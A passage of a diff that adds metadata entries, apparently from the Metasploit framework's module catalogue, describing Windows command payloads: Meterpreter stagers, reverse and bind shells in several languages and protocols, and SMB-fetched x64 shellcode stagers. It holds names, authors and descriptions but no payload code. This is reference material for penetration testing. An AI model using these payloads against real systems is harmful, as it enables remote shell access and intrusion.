"fullname": "payload/cmd/windows/python/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_http", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_http" + }, + "payload_cmd/windows/python/meterpreter/reverse_https": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_https", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_https" + }, + "payload_cmd/windows/python/meterpreter/reverse_tcp": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp" + }, + "payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell ", + "RageLtMan" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_tcp_ssl", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_ssl" + }, + "payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_uuid" + }, + "payload_cmd/windows/python/meterpreter_bind_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/python/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/python/meterpreter_reverse_http": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/cmd/windows/python/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/python/meterpreter_reverse_https": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/cmd/windows/python/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/python/meterpreter_reverse_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/python/pingback_bind_tcp": { + "name": "Python Exec, Python Pingback, Bind TCP (via python)", + "fullname": "payload/cmd/windows/python/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/windows/python/pingback_reverse_tcp": { + "name": "Python Exec, Python Pingback, Reverse TCP (via python)", + "fullname": "payload/cmd/windows/python/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/python/shell_bind_tcp": { + "name": "Python Exec, Command Shell, Bind TCP (via python)", + "fullname": "payload/cmd/windows/python/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "mumbai" + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_sctp": { + "name": "Python Exec, Command Shell, Reverse SCTP (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_sctp", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_tcp": { + "name": "Python Exec, Command Shell, Reverse TCP (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_tcp_ssl": { + "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/python/shell_reverse_udp": { + "name": "Python Exec, Command Shell, Reverse UDP (via python)", + "fullname": "payload/cmd/windows/python/shell_reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/shell_reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/shell_reverse_udp", + "staged": false + }, + "payload_cmd/windows/reverse_lua": { + "name": "Windows Command Shell, Reverse TCP (via Lua)", + "fullname": "payload/cmd/windows/reverse_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Creates an interactive shell via Lua", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/reverse_perl": { + "name": "Windows Command, Double Reverse TCP Connection (via Perl)", + "fullname": "payload/cmd/windows/reverse_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "cazz ", + "aushack " + ], + "description": "Creates an interactive shell via perl", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/reverse_powershell": { + "name": "Windows Command Shell, Reverse TCP (via Powershell)", + "fullname": "payload/cmd/windows/reverse_powershell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Dave Kennedy", + "Ben Campbell " + ], + "description": "Connect back and create a command shell via Powershell", + "references": [ + "URL-https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_powershell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/reverse_ruby": { + "name": "Windows Command Shell, Reverse TCP (via Ruby)", + "fullname": "payload/cmd/windows/reverse_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Connect back and create a command shell via Ruby", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/windows/reverse_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/custom/bind_named_pipe": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/custom/bind_tcp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/custom/bind_tcp_rc4": { + "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/custom/bind_tcp_uuid": { + "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/custom/reverse_http": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/smb/x64/custom/reverse_https": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/smb/x64/custom/reverse_named_pipe": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/smb/x64/custom/reverse_tcp": { + "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 